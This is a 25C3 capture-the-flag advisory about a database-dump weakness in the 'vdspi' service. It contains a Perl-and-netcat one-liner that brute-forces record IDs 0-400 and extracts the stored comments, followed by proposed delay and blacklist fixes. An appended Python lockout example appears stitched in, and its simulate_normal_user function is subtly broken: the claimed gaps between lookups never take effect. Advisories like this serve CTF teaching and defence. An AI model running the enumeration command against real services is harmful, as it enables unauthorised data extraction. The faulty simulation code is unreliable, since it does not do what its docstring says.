HC's Capture the Flag website
25C3-CTF
Advisory #119
From team Ailuropoda Melanoleucas
New advisory by: Samsa
Affected service(s): vdspi
Severity [lmh] : medium
===== Problem =====
A full database dump can be done by bruteforcing the menus.
===== Impact =====
The full database can be dumped. The range of IDs to try is passed to
the bruteforcer, which can be written in a few Perl lines:
perl -e 'print "1\n";for $n(0 .. 400){print "3\n"; print $n."\n";}print "0\n0\n";' \
| nc <host> <port> \
| grep -e Comment | grep -v found | grep ment | awk -F : ' {print $2}'| cut -c 2-
===== Fix =====
A simple fix could be to add more delay on user input by adding:
delay (CHAR_DELAY+LINE_DELAY)*40;
in the Get procedure in ui.adb.
A better fix would be to keep a blacklist that locks bruteforcers
out for a while.
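The blacklist approach from the fix above, as an added example in Python rather than code from the vdspi service itself (which is Ada): each client gets a sliding window over its record lookups (menu option 3), and a client that exceeds the limit is locked out for a while. The thresholds, the fake clock and the client addresses are assumptions chosen for the demonstration.

```python
import time
from collections import defaultdict, deque

# Added example, not code from the 25C3 CTF vdspi service.
# Per-client sliding window over lookups; exceeding it triggers a temporary ban.


class LookupGuard:
    def __init__(self, max_lookups=20, window=10.0, ban_seconds=300.0,
                 clock=time.monotonic):
        self.max_lookups = max_lookups      # lookups allowed per window (assumed value)
        self.window = window                # window length in seconds (assumed value)
        self.ban_seconds = ban_seconds      # lockout length in seconds (assumed value)
        self.clock = clock                  # injectable for deterministic tests
        self.history = defaultdict(deque)   # client -> timestamps of recent lookups
        self.banned_until = {}              # client -> time at which the ban expires

    def allow(self, client):
        """Return True if this lookup may proceed, False if the client is locked out."""
        now = self.clock()
        until = self.banned_until.get(client)
        if until is not None:
            if now < until:
                return False
            del self.banned_until[client]   # ban expired, start over
        q = self.history[client]
        while q and now - q[0] > self.window:
            q.popleft()                     # drop lookups outside the window
        if len(q) >= self.max_lookups:
            self.banned_until[client] = now + self.ban_seconds
            q.clear()
            return False
        q.append(now)
        return True


def simulate_enumeration(ids=range(0, 401), per_request=0.01):
    """Replay the advisory's ID enumeration (0..400) at 10 ms per request
    against the guard; returns how many lookups were actually answered."""
    t = [0.0]
    guard = LookupGuard(clock=lambda: t[0])
    served = 0
    for _ in ids:
        if guard.allow("10.0.0.1"):         # constructed client address
            served += 1
        t[0] += per_request
    return served


def simulate_normal_user(lookups=5, gap=3.0):
    """A user doing a handful of lookups a few seconds apart is never blocked."""
    t = [0.0]
    guard = LookupGuard(clock=lambda: t[0])
    answered = sum(1 for _ in range(lookups)
                   if guard.allow("10.0.0.2") or t.__setitem__(0, t[0] + gap))
    return answered
```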
Rating
[0] there is a much more practical and effective fix